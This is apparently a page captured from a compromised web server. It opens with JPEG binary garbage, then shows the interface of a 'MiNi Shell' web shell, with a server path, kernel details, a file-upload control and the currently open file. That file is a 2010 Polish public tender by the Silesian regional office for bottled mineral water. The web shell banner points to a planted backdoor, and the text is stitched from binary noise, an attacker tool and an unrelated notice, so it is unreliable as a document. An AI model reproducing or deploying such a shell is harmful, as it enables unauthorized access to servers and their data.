JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100630/170991-N-2010.html

<p class="kh_header"><b>Katowice: Sukcesywna dostawa średniozmineralizowanej wody mineralnej w butelkach</b><br>
<b>Numer ogłoszenia: 170991 - 2010; data zamieszczenia: 30.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Śląskie , ul. Ligonia 46, 40-037 Katowice, woj. śląskie, tel. 032 2078562, faks 032 2078578.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.silesia-region.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa średniozmineralizowanej wody mineralnej w butelkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sukcesywna dostawa średniozmineralizowanej wody mineralnej w butelkach, do siedziby Urzędu Marszałkowskiego Województwa Śląskiego w Katowicach, ul. Ligonia 46.
A. Naturalna woda mineralna Ustronianka lub równoważna.
Pod pojęciem równoważna Zamawiający rozumie wodę posiadającą porównywalną zawartość głównych składników mineralnych w butelce,
- nasycona dwutlenkiem węgla, 
- w szklanej butelce,
- średniozmineralizowana, całkowita ogólna mineralizacja: od 514,00 mg/l do 517,00 mg/l. 
Główne składniki mineralne:
Aniony: 
- wodorowęglanowy: od 329,00 mg/l do 346,00 mg/l
- chlorkowy: od 8,00 mg/l do 9,00 mg/l
- siarczanowy: od 27,40 mg/l do 38,00 mg/l
- fluorki: od 0,3 mg/l do 0,5 mg/l,
Kationy: 
- wapniowy: od 67,00 mg/l do 109,20 mg/l
- magnezowy: od 7,40 mg/l do 36,5 mg/l
- sodowy: od 5,15 mg/l do 9,00 mg/l.
Wielkość jednostkowa - 1 zgrzewka = 6 lub 12 butelek o pojemności 0,3 litra.
Ilość - 600 sztuk butelek.
B. Naturalna woda mineralna Ustronianka lub równoważna.
Pod pojęciem równoważna Zamawiający rozumie wodę posiadającą porównywalną zawartość głównych składników mineralnych w butelce,
- nienasycona dwutlenkiem węgla, 
- w szklanej butelce,
- średniozmineralizowana, całkowita ogólna mineralizacja: od 514,00 mg/l do 517,00 mg/l.
Główne składniki mineralne:
Aniony: 
- wodorowęglanowy: od 329,00 mg/l do 346,00 mg/l
- chlorkowy: od 8,00 mg/l do 9,00 mg/l
- siarczanowy: od 27,40 mg/l do 38,00 mg/l
- fluorki: od 0,3 mg/l do 0,5 mg/l, 
Kationy: 
- wapniowy: od 67,00 mg/l do 109,20 mg/l
- magnezowy: od 7,40 mg/l do 36,5 mg/l
- sodowy: od 5,15 mg/l do 9,00 mg/l.
Wielkość jednostkowa - 1 zgrzewka = 6 lub 12 butelek o pojemności 0,3 litra.
Ilość - 600 sztuk butelek.
C. Naturalna woda mineralna Nałęczowianka lub równoważna.
Pod pojęciem równoważna Zamawiający rozumie wodę posiadającą porównywalną zawartość głównych składników mineralnych w butelce,
- nasycona dwutlenkiem węgla, 
- w butelce typu PET,
- średniozmineralizowana, całkowita ogólna mineralizacja: od 624,00 mg/l do 714,00 mg/l,
Główne składniki mineralne:
Aniony: 
- wodorowęglanowy: od 439,00 mg/l do 519,00 mg/l
- chlorkowy: od 5,00 mg/l do 7,00 mg/l,
Kationy: 
- wapniowy: od 108,00 mg/l do 129,00 mg/l
- magnezowy: od 21,00 mg/l do 22,00 mg/l
- sodowy: od 9,00 mg/l do 10,00 mg/l
- potasowy: od 2,00 mg/l do 2,50 mg/l.
Wielkość jednostkowa - 1 zgrzewka = 12 butelek o pojemności 0,5 litra.
Ilość - 2400 sztuk butelek.
D. Naturalna woda mineralna Nałęczowianka lub równoważna.
Pod pojęciem równoważna Zamawiający rozumie wodę posiadającą porównywalną zawartość głównych składników mineralnych w butelce,
- nienasycona dwutlenkiem węgla, 
- w butelce typu PET,
- średniozmineralizowana, całkowita ogólna mineralizacja: od 624,00 mg/l do 714,00 mg/l,
Główne składniki mineralne:
Aniony: 
- wodorowęglanowy: od 439,00 mg/l do 519,00 mg/l
- chlorkowy: od 5,00 mg/l do 7,00 mg/l,
Kationy: 
- wapniowy: od 108,00 mg/l do 129,00 mg/l
- magnezowy: od 21,00 mg/l do 22,00 mg/l
- sodowy: od 9,00 mg/l do 10,00 mg/l
- potasowy: od 2,00 mg/l do 2,50 mg/l.
Wielkość jednostkowa - 1 zgrzewka = 12 butelek o pojemności 0,5 litra.
Ilość - 1920 sztuk butelek.
2. Realizacja przedmiotu zamówienia będzie odbywać się sukcesywnie według potrzeb Zamawiającego, zgłaszanych faxem lub za pośrednictwem poczty e-mail przez osobę wskazaną przez Zamawiającego. Wykonawca będzie dostarczał przedmiot zamówienia po wcześniejszych uzgodnieniach z Wydziałem Informatyki i Administracji Urzędu Marszałkowskiego Województwa Śląskiego.
3. Wykonawca będzie dostarczał zamówiony towar do wskazanego przez Zamawiającego pomieszczenia w Urzędzie Marszałkowskim Województwa Śląskiego w Katowicach przy ul. Ligonia 46.
4. Dostawy będą realizowane w dni robocze od poniedziałku do piątku w godzinach od 8:00 do 14:00, w terminie do trzech dni roboczych licząc od daty złożenia zamówienia. W sytuacjach szczególnych Zamawiający dopuszcza możliwość realizacji przedmiotu zamówienia w innym terminie uzgodnionym pomiędzy stronami.
5. Okres przydatności do spożycia zamawianego towaru nie może być krótszy niż sześć miesięcy od daty dostawy.
6. Jakość wody powinna spełniać wymagania określone w Polskich Normach oraz Rozporządzeniu Ministra Zdrowia z dnia 29.04.2004r. w sprawie naturalnych wód mineralnych, naturalnych wód źródlanych i wód stołowych (Dz. U. z 2004 nr 120 poz. 1256 z późń. zm.).
7. W cenie określonej przez Wykonawcę muszą zostać ujęte wszystkie elementy kosztów realizacji przedmiotu zamówienia, w tym m.in. transport i rozładunek.
8. Przedstawione ilości wody mineralnej stanowią maksymalny poziom przedmiotu zamówienia. Zamawiający zastrzega sobie możliwość zmniejszenia zamówienia do ilości nie mniejszej niż 60% maksymalnego poziomu przedmiotu zamówienia, a Wykonawca nie będzie wnosił żadnych roszczeń z tego tytułu. Rozliczanie nastąpi zgodnie z rzeczywistym wykonaniem przedmiotu zamówienia, zgodnie z cenami jednostkowymi określonymi przez Wykonawcę w formularzu ofertowym.
Kopia formularza ofertowego wybranego Wykonawcy będzie stanowiła załącznik nr 2 do umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia wymienionego w pkt III.4.1). Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia wymienionego w pkt III.4.1). Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia wymienionego w pkt III.4.1). Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia wymienionego w pkt III.4.1). Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania ww. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia wymienionego w pkt III.4.1). Nie wykazanie spełniania ww. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. WNIOSEK O DOPUSZCZENIE DO UDZIAŁU W LICYTACJI ELEKTRONICZNEJ - wzór stanowi załącznik nr 2 do OGŁOSZENIA. Wniosek wraz z pozostałymi dokumentami należy dostarczyć w opakowaniu lub kopercie, zaklejonej i opisanej nazwą i adresem Wykonawcy oraz hasłem: Wniosek o dopuszczenie do udziału w licytacji elektronicznej na sukcesywną dostawę średniozmineralizowanej wody mineralnej w butelkach do siedziby Urzędu Marszałkowskiego Województwa Śląskiego w Katowicach - ZP/H/1/2010. Wszelkie konsekwencje wynikające z nieodpowiedniego oznaczenia wniosku ponosi Wykonawca.
Wniosek winien być podpisany przez osoby uprawnione do reprezentowania Wykonawcy w miejscach zaznaczonych w taki sposób, aby tożsamość tej osoby/osób
była identyfikowalna (np. podpis opatrzony imienną pieczęcią, czy też czytelny podpis składający się z pełnego imienia i nazwiska). Do wniosku Wykonawca winien załączyć wszystkie wymagane dokumenty, oświadczenia wymienione w pkt III.4.1) i III.4.2).
2. Zaleca się, aby do wniosku składanego przez osoby fizyczne dołączyć zaświadczenie o wpisie do ewidencji działalności gospodarczej (oryginał lub kopia poświadczona za zgodność z oryginałem).
3. Jeżeli uprawnienie do podpisania wniosku nie wynika z właściwego rejestru
lub ewidencji działalności gospodarczej do oferty winno być dołączone stosowne pełnomocnictwo. Pełnomocnictwo powinno być przedstawione w formie oryginału lub kopii poświadczonej notarialnie.
4. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Z chwilą ustanowienia pełnomocnika istnieje obowiązek załączenia pełnomocnictwa. Przepisy dotyczące pojedynczego Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty i oświadczenia, o których mowa w pkt III.4.1) winny być złożone w taki sposób, aby warunki, o których mowa w w pkt III.3)  Wykonawcy występujący wspólnie spełnili łącznie. Dokumenty i oświadczenia, o których mowa w pkt III.4.2) składa odrębnie każdy z Wykonawców występujących wspólnie.
6. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę
lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokument ten powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
7. Wszystkie dokumenty, winny być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia kopie dokumentów dotyczących Wykonawcy powinny być poświadczane za zgodność z oryginałem przez Wykonawcę. Postępowanie jest prowadzone w języku polskim. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> http://bip.silesia-region.pl/index.php?grupa=2</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Wymagania formalne: 
1.1. Z platformy w pełnym zakresie mogą korzystać wyłącznie Wykonawcy zarejestrowani w systemie pod adresem http://licytacje.uzp.gov.pl;
1.2. Wykonawca, aby umożliwić Zamawiającemu dopuszczenie go do udziału w licytacji, winien zarejestrować się w systemie dostępnym na stronie http://licytacje.uzp.gov.pl, a wraz z wnioskiem o dopuszczenie go do udziału w licytacji winien przekazać Zamawiającemu informację o swoim loginie; 
1.3. W przypadku podania przez Wykonawcę niewłaściwego loginu (login należy podać dokładnie stosując te same znaki w tym duże i małe litery, jeżeli takie zastosowano przy rejestracji) bądź nie przekazania go Zamawiającemu wraz z wnioskiem, wykonawca jest zobowiązany do jego przekazania najpóźniej na dwa dni przed terminem otwarcia licytacji. Nie dostarczenie loginu w sposób i w terminie określonym powyżej będzie traktowane jako odstąpienie wykonawcy od dalszego postępowania.
2. Wymagania techniczne: 
2.1. Komputer PC z systemem operacyjnym Windows/Linux oraz przeglądarka internetowa Internet Explorer 6.0 i 7.0 lub Firefox 2.0 i 3.0, podłączony do sieci Internet. 
2.2. Nie jest wymagany podpis elektroniczny.</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1)Wykonawca składa ofertę w postaci elektronicznej. 
2)Oferty składane przez wykonawców podlegają automatycznej klasyfikacji na podstawie ceny. 
3)Przedmiotowa licytacja elektroniczna będzie licytacją 1-etapową. 
4)W toku licytacji elektronicznej wykonawcy składają kolejne korzystniejsze postąpienia. Możliwość złożenia postąpienia istnieje od otwarcia licytacji do jej zamknięcia. 
5)Oferta złożona w toku licytacji przestaje wiązać, gdy inny wykonawca złożył ofertę korzystniejszą. 
6)W toku licytacji wykonawcy proponują rzeczywistą cenę oferty brutto (cena za sumę 4 pozycji asortymentowych wody) wyrażoną w złotych polskich oraz w groszach. Grosze należy oddzielić od złotych kropką. 
7)Oferta złożona przez wykonawcę winna być niższa od oferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia. 
8)W toku licytacji elektronicznej zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie wykonawców biorących udział w licytacji, a także o cenach złożonych przez nich ofert, z tym że do momentu zamknięcia licytacji elektronicznej nie ujawni informacji umożliwiających identyfikację Wykonawców. 
9)Zamawiający przyjął jako cenę wywoławczą brutto: 10 570,08 zł.
10)Wysokość minimalnego postąpienia: 50,00 zł.
11)Zamawiający udzieli zamówienia Wykonawcy, który zaoferował najniższą cenę brutto.</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 30 min.</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 08.07.2010 godzina 11:00, miejsce: Urząd Marszałkowski Województwa Śląskiego, ul. Ligonia 46, 40-037 Katowice, Kancelaria Ogólna - pok. 164. Wnioski można składać w dni robocze, od poniedziałku do piątku w godzinach od 7.30 do 15.30.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> 6 dni od dnia przekazania Wykonawcom zaproszeń do składania ofert, godz. 11.00.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>6 dni od dnia przekazania Wykonawcom zaproszeń do składania ofert, godz. 11:30</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Zamawiający nie żąda zabezpieczenia należytego wykonania umowy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Wzór umowy stanowi załącznik nr 6 do ogłoszenia - dostępny na stronie internetowej Zamawiającego: http://bip.silesia-region.pl/index.php?grupa=2</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Integralną część ogłoszenia stanowią następujące załączniki: Załączniki nr 1 - Opis przedmiotu zamówienia, Załącznik nr 2 - Wniosek o dopuszczenie do udziału w licytacji, Załącznik nr 3 - Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych, Załącznik nr 4 - Oświadczenie o braku podstaw do wykluczenia z postępowania, Załącznik nr 5 - Oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, Załącznik nr 6 - Wzór umowy, Załącznik nr 7 - formularz ofertowy.
2. Zamawiający dopuści do udziału w licytacji elektronicznej i zaprosi do składania ofert wszystkich Wykonawców spełniających warunki udziału w postępowaniu, tj. Wykonawców, którzy spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych oraz wykażą brak podstaw do wykluczenia z postępowania o udzielenie zamówienia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych.
3. Ocena spełniania warunków udziału w postępowaniu, zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do wniosku oświadczeń i dokumentów, wymienionych w pkt III.4.1) i III.4.2). Nie wykazanie spełniania ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.
4. W cenie określonej przez Wykonawcę muszą zostać ujęte wszystkie elementy kosztów realizacji przedmiotu zamówienia, w tym m.in. transport i rozładunek.
5. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, przed podpisaniem umowy dostarczy wypełniony formularz ofertowy - zał. nr 7 do ogłoszenia - dostępny na stronie Zamawiającego http://bip.silesia-region.pl/index.php?grupa=2, podając w nim ceny jednostkowe, cenę netto, stawkę VAT oraz cenę brutto za realizację zamówienia. Formularz ten będzie stanowić załącznik do umowy.
6. Jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana jako najkorzystniejsza, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.
7. Uprawionym do porozumiewania się z Wykonawcami jest Artur Adamiok
tel./ fax.: (32) 20 78 567 / (32) 20 78 578.</p>
